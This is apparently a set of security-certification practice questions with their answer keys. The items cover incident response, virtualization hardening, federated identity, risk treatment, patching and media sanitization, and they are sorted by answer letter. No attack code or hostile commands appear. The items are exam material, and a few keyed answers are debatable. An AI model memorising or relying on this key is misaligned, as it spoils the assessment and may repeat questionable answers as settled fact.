The Chief Executive Officer (CEO) of a corporation purchased the latest mobile device and connected it to the internal network. The CEO proceeded to download sensitive financial documents through their email. The device was then lost in transit to a conference. The CEO notified the company helpdesk about the lost device and another one was shipped out, after which the helpdesk ticket was closed stating the issue was resolved. This data breach was not properly reported due to insufficient training surrounding which of the following processes? A. E-Discovery B. Data handling C. Incident response D. Data recovery and storage
C. Incident response
An administrator wants to virtualize the company's web servers, application servers, and database servers. Which of the following should be done to secure the virtual host machines? (Select TWO). A. Establish VLANs for each virtual guest's NIC on the virtual switch. B. Enable virtual switch layer 2 security precautions. C. Only access hosts through a secure management interface. D. Distribute guests to hosts by application role or trust zone. E. Restrict physical and network access to the host console.
C. Only access hosts through a secure management interface. E. Restrict physical and network access to the host console.
A security audit has uncovered that some of the encryption keys used to secure the company B2B financial transactions with its partners may be too weak. The security administrator needs to implement a process to ensure that financial transactions will not be compromised if a weak encryption key is found. Which of the following should the security administrator implement? A. Entropy should be enabled on all SSLv2 transactions. B. AES256-CBC should be implemented for all encrypted data. C. PFS should be implemented on all VPN tunnels. D. PFS should be implemented on all SSH connections.
C. PFS should be implemented on all VPN tunnels.
The security administrator of a small private firm is researching and putting together a proposal to purchase an IPS to replace an existing IDS. A specific brand and model has been selected, but the security administrator needs to gather various cost information for that product. Which of the following documents would perform a cost analysis report and include information such as payment terms? A. RFI B. RTO C. RFQ D. RFC
C. RFQ
A security audit has uncovered a lack of security controls with respect to employees' network account management. Specifically, the audit reveals that employee's network accounts are not disabled in a timely manner once an employee departs the organization. The company policy states that the network account of an employee should be disabled within eight hours of termination. However, the audit shows that 5% of the accounts were not terminated until three days after a dismissed employee departs. Furthermore, 2% of the accounts are still active. Which of the following is the BEST course of action that the security officer can take to avoid repeat audit findings? A. Review the HR termination process and ask the software developers to review the identity management code. B. Enforce the company policy by conducting monthly account reviews of inactive accounts. C. Review the termination policy with the company managers to ensure prompt reporting of employee terminations. D. Update the company policy to account for delays and unforeseen situations in account deactivation.
C. Review the termination policy with the company managers to ensure prompt reporting of employee terminations.
A user logs into domain A using a PKI certificate on a smartcard protected by an 8 digit PIN. The credential is cached by the authenticating server in domain A. Later, the user attempts to access a resource in domain B. This initiates a request to the original authenticating server to somehow attest to the resource server in the second domain that the user is in fact who they claim to be. Which of the following is being described? A. Authentication B. Authorization C. SAML D. Kerberos
C. SAML
A project has been established in a large bank to develop a new secure online banking platform. Half way through the development it was discovered that a key piece of software used as part of the base platform is now susceptible to recently published exploits. Who should be contacted FIRST by the project team to discuss potential changes to the platform requirements? A. Engineers B. Facilities Manager C. Stakeholders D. Human Resources
C. Stakeholders
Which of the following precautions should be taken to harden network devices in case of VMEscape? A. Database servers should be on the same virtual server as web servers in the DMZ network segment. B. Web servers should be on the same physical server as database servers in the network segment. C. Virtual servers should only be on the same physical server as others in their network segment. D. Physical servers should only be on the same WAN as other physical servers in their network.
C. Virtual servers should only be on the same physical server as others in their network segment.
The sales division within a large organization purchased touch screen tablet computers for all 250 sales representatives in an effort to showcase the use of technology to its customers and increase productivity. This includes the development of a new product tracking application that works with the new platform. The security manager attempted to stop the deployment because the equipment and application are non-standard and unsupported within the organization. However, upper management decided to continue the deployment. Which of the following provides the BEST method for evaluating the potential threats? A. Conduct a vulnerability assessment to determine the security posture of the new devices and the application. B. Benchmark other organization's that already encountered this type of situation and apply all relevant learning's and industry best practices. C. Work with the business to understand and classify the risk associated with the full lifecycle of the hardware and software deployment. D. Develop a standard image for the new devices and migrate to a web application to eliminate locally resident data.
C. Work with the business to understand and classify the risk associated with the full lifecycle of the hardware and software deployment.
The IT department of a large telecommunications company has developed and finalized a set of security solutions and policies which have been approved by upper management for deployment within the company. During the development of the security solutions and policies, the FIRST thing the IT department should have done was: A. contact vendor management so the RFI and RFP process can be started as soon as possible. B. contact an independent consultant who can tell them what policies and solutions they need. C. discuss requirements with stakeholders from the various internal departments. D. involve facilities management early in the project so they can plan for the new security hardware in the data center.
C. discuss requirements with stakeholders from the various internal departments.
An administrator is assessing the potential risk impact on an accounting system and categorizes it as follows: Administrative Files = {(Confidentiality, Moderate), (Integrity, Moderate), (Availability, Low)} Vendor Information = {(Confidentiality, Moderate), (Integrity, Low), (Availability, Low)} Payroll Data = {(Confidentiality, High), (Integrity, Moderate), (Availability, Low)} Which of the following is the aggregate risk impact on the accounting system? A. {(Confidentiality, Moderate), (Integrity, Moderate), (Availability, Moderate)} B. {(Confidentiality, High), (Integrity, Low), (Availability, Low)} C. {(Confidentiality, High), (Integrity, Moderate), (Availability, Low)} D. {(Confidentiality, Moderate), (Integrity, Moderate), (Availability, Low)}
C. {(Confidentiality, High), (Integrity, Moderate), (Availability, Low)
Which of the following BEST defines the term e-discovery? A. A product that provides IT-specific governance, risk management, and compliance. B. A form of reconnaissance used by penetration testers to discover listening hosts. C. A synonymous term for computer emergency response and incident handling. D. A process of producing electronically stored information for use as evidence.
D. A process of producing electronically stored information for use as evidence.
Which of the following refers to programs running in an isolated space to run untested code and prevents the code from making permanent changes to the OS kernel and other data on the host machine? A. Input Validation B. Application hardening C. Code signing D. Application sandboxing
D. Application sandboxing
A system designer needs to factor in CIA requirements for a new SAN. Which of the CIA requirements is BEST met by multipathing? A. Confidentiality B. Authentication C. Integrity D. Availability
D. Availability
The security administrator is receiving numerous alerts from the internal IDS of a possible Conficker infection spreading through the network via the Windows file sharing services. Given the size of the company which deploys over 20,000 workstations and 1,000 servers, the security engineer believes that the best course of action is to block the file sharing service across the organization by placing ACLs on the internal routers. Which of the following should the security administrator do before applying the ACL? A. Quickly research best practices with respect to stopping Conficker infections and implement the solution. B. Consult with the rest of the security team and get approval on the solution by all the team members and the team manager. C. Apply the ACL immediately since this is an emergency that could lead to a widespread data compromise. D. Call an emergency change management meeting to ensure the ACL will not impact core business functions.
D. Call an emergency change management meeting to ensure the ACL will not impact core business functions.
A company contracts with a third party to develop a new web application to process credit cards. Which of the following assessments will give the company the GREATEST level of assurance for the web application? A. Social Engineering B. Penetration Test C. Vulnerability Assessment D. Code Review
D. Code Review
A certain script was recently altered by the author to meet certain security requirements, and needs to be executed on several critical servers. Which of the following describes the process of ensuring that the script being used was not altered by anyone other than the author? A. Digital encryption B. Digital signing C. Password entropy D. Code signing
D. Code signing
Company XYZ provides residential television cable service across a large region. The company's board of directors is in the process of approving a deal with the following three companies: A National landline telephone provider A Regional wireless telephone provider An international Internet service provider The board of directors at Company XYZ wants to keep the companies and billing separated. While the Chief Information Officer (CIO) at Company XYZ is concerned about the confidentiality of Company XYZ's customer data and wants to share only minimal information about its customers for the purpose of accounting, billing, and customer authentication. The proposed solution must use open standards and must make it simple and seamless for Company XYZ's customers to receive all four services. Which of the following solutions is BEST suited for this scenario? A. All four companies must implement a TACACS+ web based single sign-on solution with associated captive portal technology. B. Company XYZ must implement VPN and strict access control to allow the other three companies to access the internal LDAP. C. Company XYZ needs to install the SP, while the partner companies need to install the WAYF portion of a Federated identity solution. D. Company XYZ needs to install the IdP, while the partner companies need to install the SP portion of a Federated identity solution.
D. Company XYZ needs to install the IdP, while the partner companies need to install the SP portion of a Federated identity solution.
A user reports that the workstation's mouse pointer is moving and files are opening automatically. Which of the following should the user perform? A. Unplug the network cable to avoid network activity. B. Reboot the workstation to see if problem occurs again. C. Turn off the computer to avoid any more issues. D. Contact the incident response team for direction.
D. Contact the incident response team for direction.
Which of the following must be taken into consideration for e-discovery purposes when a legal case is first presented to a company? A. Data ownership on all files B. Data size on physical disks C. Data retention policies on only file servers D. Data recovery and storage
D. Data recovery and storage
Several critical servers are unresponsive after an update was installed. Other computers that have not yet received the same update are operational, but are vulnerable to certain buffer overflow attacks. The security administrator is required to ensure all systems have the latest updates while minimizing any downtime. Which of the following is the BEST risk mitigation strategy to use to ensure a system is properly updated and operational? A. Distributed patch management system where all systems in production are patched as updates are released. B. Central patch management system where all systems in production are patched by automatic updates as they are released. C. Central patch management system where all updates are tested in a lab environment after being installed on a live production system. D. Distributed patch management system where all updates are tested in a lab environment prior to being installed on a live production system.
D. Distributed patch management system where all updates are tested in a lab environment prior to being installed on a live production system.
Which of the following attacks does Unicast Reverse Path Forwarding prevent? A. Man in the Middle B. ARP poisoning C. Broadcast storm D. IP Spoofing
D. IP Spoofing
A security consultant is evaluating forms which will be used on a company website. Which of the following techniques or terms is MOST effective at preventing malicious individuals from successfully exploiting programming flaws in the website? A. Anti-spam software B. Application sandboxing C. Data loss prevention D. Input validation
D. Input validation
A web administrator develops a web form for users to respond to the company via a web page. Which of the following should be practiced to avoid a security risk? A. SQL injection B. XSS scripting C. Click jacking D. Input validation
D. Input validation
Which of the following authentication types is used primarily to authenticate users through the use of tickets? A. LDAP B. RADIUS C. TACACS+ D. Kerberos
D. Kerberos
An administrator is reviewing a recent security audit and determines that two users in finance also have access to the human resource data. One of those users fills in for any HR employees on vacation, the other user only works in finance. Which of the following policies is being violated by the finance user according to the audit results? A. Mandatory vacation B. Non-disclosure C. Job rotation D. Least privilege
D. Least privilege
A security incident happens three times a year on a company's web server costing the company $1,500 in downtime, per occurrence. The web server is only for archival access and is scheduled to be decommissioned in five years. The cost of implementing software to prevent this incident would be $15,000 initially, plus $1,000 a year for maintenance. Which of the following is the MOST cost-effective manner to deal with this risk? A. Avoid the risk B. Transfer the risk C. Accept the risk D. Mitigate the risk
D. Mitigate the risk
A security administrator of a large private firm is researching and putting together a proposal to purchase an IPS. The specific IPS type has not been selected, and the security administrator needs to gather information from several vendors to determine a specific product. Which of the following documents would assist in choosing a specific brand and model? A. RFC B. RTO C. RFQ D. RFI
D. RFI
Which of the following is the MOST appropriate control measure for lost mobile devices? A. Disable unnecessary wireless interfaces such as Bluetooth. B. Reduce the amount of sensitive data stored on the device. C. Require authentication before access is given to the device. D. Require that the compromised devices be remotely wiped.
D. Require that the compromised devices be remotely wiped
Which of the following is the MOST cost-effective solution for sanitizing a DVD with sensitive information on it? A. Write over the data B. Purge the data C. Incinerate the DVD D. Shred the DVD
D. Shred the DVD
A security administrator needs a secure computing solution to use for all of the company's security audit log storage, and to act as a central server to execute security functions from. Which of the following is the BEST option for the server in this scenario? A. A hardened Red Hat Enterprise Linux implementation running a software firewall B. Windows 7 with a secure domain policy and smartcard based authentication C. A hardened bastion host with a permit all policy implemented in a software firewall D. Solaris 10 with trusted extensions or SE Linux with a trusted policy
D. Solaris 10 with trusted extensions or SE Linux with a trusted policy
Statement: "The system shall implement measures to notify system administrators prior to a security incident occurring." Which of the following BEST restates the above statement to allow it to be implemented by a team of software developers? A. The system shall cease processing data when certain configurable events occur. B. The system shall continue processing in the event of an error and email the security administrator the error logs. C. The system shall halt on error. D. The system shall throw an error when specified incidents pass a configurable threshold.
D. The system shall throw an error when specified incidents pass a configurable threshold.
A business is currently in the process of upgrading its network infrastructure to accommodate a personnel growth of over fifty percent within the next six months. All preliminary planning has been completed and a risk assessment plan is being adopted to decide which security controls to put in place throughout each phase. Which of the following risk responses is MOST likely being considered if the business is creating an SLA with a third party? A. Accepting risk B. Mitigating risk C. Identifying risk D. Transferring risk
D. Transferring risk
An Information Security Officer (ISO) has asked a security team to randomly retrieve discarded computers from the warehouse dumpster. The security team was able to retrieve two older computers and a broken MFD network printer. The security team was able to connect the hard drives from the two computers and the network printer to a computer equipped with forensic tools. The security team was able to retrieve PDF files from the network printer hard drive but the data on the two older hard drives was inaccessible. Which of the following should the Warehouse Manager do to remediate the security issue? A. Revise the hardware and software maintenance contract. B. Degauss the printer hard drive to delete data. C. Implement a new change control process. D. Update the hardware decommissioning procedures.
D. Update the hardware decommissioning procedures.
A company which manufactures ASICs for use in an IDS wants to ensure that the ASICs' code is not prone to buffer and integer overflows. The ASIC technology is copyrighted and the confidentiality of the ASIC code design is exceptionally important. The company is required to conduct internal vulnerability testing as well as testing by a third party. Which of the following should be implemented in the SDLC to achieve these requirements? A. Regression testing by the manufacturer and integration testing by the third party B. User acceptance testing by the manufacturer and black box testing by the third party C. Defect testing by the manufacturer and user acceptance testing by the third party D. White box unit testing by the manufacturer and black box testing by the third party
D. White box unit testing by the manufacturer and black box testing by the third party
